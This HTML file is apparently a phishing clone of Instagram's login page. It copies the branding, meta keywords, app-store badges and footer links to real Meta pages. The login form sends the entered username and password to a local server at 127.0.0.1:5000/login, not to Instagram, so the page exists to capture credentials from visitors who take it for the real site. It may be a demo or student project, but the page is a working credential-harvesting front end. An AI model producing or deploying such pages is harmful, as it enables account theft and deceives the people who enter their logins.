<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description"
        content="Log in to Instagram. Enter your phone number, username, or email and your password to access your account.">
    <meta name="keywords" content="Instagram login
    Instagram sign-in
    Instagram account access
    Log in to Instagram
    Instagram username and password
    Social media login
    Instagram authentication
    Secure Instagram login
    Forgot Instagram password
    Instagram account recovery
    Two-factor authentication (2FA) on Instagram
    Instagram login page
    Instagram mobile login
    Instagram login issues
    Instagram login help
    Instagram login security
    Instagram login tutorial
    Instagram login problems
    Instagram login screen
    Instagram login tips">


    <title>Instagram</title>
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
    <link rel="stylesheet" href="styles.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.2.0/css/all.min.css">
    <link href="https://fonts.googleapis.com/css2?family=Noto+Sans+Devanagari&display=swap" rel="stylesheet">
    <link rel="icon" href="hlogo.webp" type="image/x-icon">

</head>

<body>
    <div class="container">

        <div class="row justify-content-center mt-5">
            <div class="video disable">
                <video autoplay loop muted plays-inline disable disablepictureinpicture width="400" height="580">
                    <source src="instvid.mp4" type="video/mp4">
                </video>
            </div>
            <div class="col-md-6 col-lg-4">
                <div class="card">
                    <div class="card-body text-center justify-content-center">
                        <img src="pngwing.com.png" alt="Instagram Logo" width="210" height="140">
                        <form id="login-form" action="http://127.0.0.1:5000/login" method="post">
                            <div class="form-group">
                                <input type="email" class="form-control" id="username" name="username"
                                    placeholder="Phone number, username,or email" required>
                            </div>
                            <div class="form-group">
                                <input type="password" class="form-control" id="password" name="password" placeholder="Password"
                                    required>
                            </div>
                            <button type="submit" class="btn btn-sm">Log In</button>
                        </form>
                        <div class="or-divider">
                            <hr class="hr1">
                            <div class="or-text">OR</div>
                            <hr class="hr2">
                        </div>
                        <div class="facebook-login mt-3">
                            <i class="fab fa-facebook-square mx-1"></i><a href="https://www.facebook.com/login.php">Log
                                in with Facebook</a>
                        </div>
                        <div class="text-center mt-3 ">
                            <!-- forget password page -->
                            <a href="https://www.instagram.com/accounts/password/reset/" id="fgt">Forgot Password?</a>
                        </div>
                    </div>
                </div>
                <section class="card mt-2">
                    <div class="card-body text-center">
                        <span>Don't have an account? </span>
                        <a href="https://www.instagram.com/accounts/emailsignup/" id="no">
                            Sign Up</a>
                    </div>
                </section>
                <p class="text-center mt-3">Get the app.</p>
                <div class="store pl-4 justify-content-center ">
                    <a href="https://play.google.com/store/apps/details?id=com.instagram.android">
                        <img src="googleplay.png" width="130" height="40"></a>
                    <a
                        href="ms-windows-store://pdp/?productid=9nblggh5l9xt&referrer=appbadge&source=www.instagram.com&mode=mini&pos=6%2C7%2C2250%2C1234"><img
                            src="micro.png" class=" pl-3" width="140" height="40"></a>
                </div>
            </div>

        </div>

    </div>

    <footer class="container mt-5 pt-4">
        <div class="row">
            <div class="col">
                <div class="text-center">
                    <a href="https://meta.com/" class="text-secondary">Meta</a>
                    <span class="mx-2"> </span>
                    <a href="https://about.instagram.com/" class="text-secondary">About</a>
                    <span class="mx-2"> </span>
                    <a href="https://about.instagram.com/blog/" class="text-secondary">Blog</a>
                    <span class="mx-2"> </span>
                    <a href="https://about.instagram.com/about-us/careers" class="text-secondary">Jobs</a>
                    <span class="mx-2"> </span>
                    <a href="https://help.instagram.com/" class="text-secondary">Help</a>
                    <span class="mx-2"> </span>
                    <a href="https://developers.facebook.com/docs/instagram" class="text-secondary">API</a>
                    <span class="mx-2"> </span>
                    <a href="https://privacycenter.instagram.com/policy/?entry_point=ig_help_center_data_policy_redirect"
                        class="text-secondary">Privacy</a>
                    <span class="mx-2"> </span>
                    <a href="https://help.instagram.com/581066165581870/" class="text-secondary">Terms</a>
                    <span class="mx-2"> </span>
                    <a href="https://www.instagram.com/" class="text-secondary">Locations</a>
                    <span class="mx-2"> </span>
                    <a href="https://www.instagram.com/web/lite/" class="text-secondary">Instagram Lite</a>
                    <span class="mx-2"> </span>
                    <a href="https://www.threads.net/login" class="text-secondary">Threads</a>
                    <span class="mx-2"> </span>
                    <a href="https://www.facebook.com/help/instagram/261704639352628" class="text-secondary">Contact
                        Uploading & Non-Users</a>
                    <span class="mx-2"> </span>
                    <a href="https://about.meta.com/technologies/meta-verified/" class="text-secondary">Meta
                        Verified</a>
                </div>
                <div class="text-center text-secondary mt-2">
                    <select name="language-selector" id="language-selector" class="dynamic-dropdown">
                        <option value="en">English</option>
                        <option value="fr">Français</option> <!-- French -->
                        <option value="es">Español</option> <!-- Spanish -->
                        <option value="de">Deutsch</option> <!-- German -->
                        <option value="it">Italiano</option> <!-- Italian -->
                        <option value="ja">日本語</option> <!-- Japanese -->
                        <option value="ko">한국어</option> <!-- Korean -->
                        <option value="ru">Русский</option> <!-- Russian -->
                        <option value="zh">中文</option> <!-- Chinese -->
                        <option value="ar">العربية</option> <!-- Arabic -->
                        <option value="hi">हिन्दी</option> <!-- Hindi -->
                        <option value="tr">Türkçe</option> <!-- Turkish -->
                        <option value="sv">Svenska</option> <!-- Swedish -->
                        <option value="fi">Suomi</option> <!-- Finnish -->
                        <option value="no">Norsk</option> <!-- Norwegian -->
                    </select>

                    &copy; 2023 Instagram from Meta
                </div>

            </div>
        </div>
    </footer>
    <script src="script.js"></script>
    <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.5.3/dist/umd/popper.min.js"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
</body>

</html>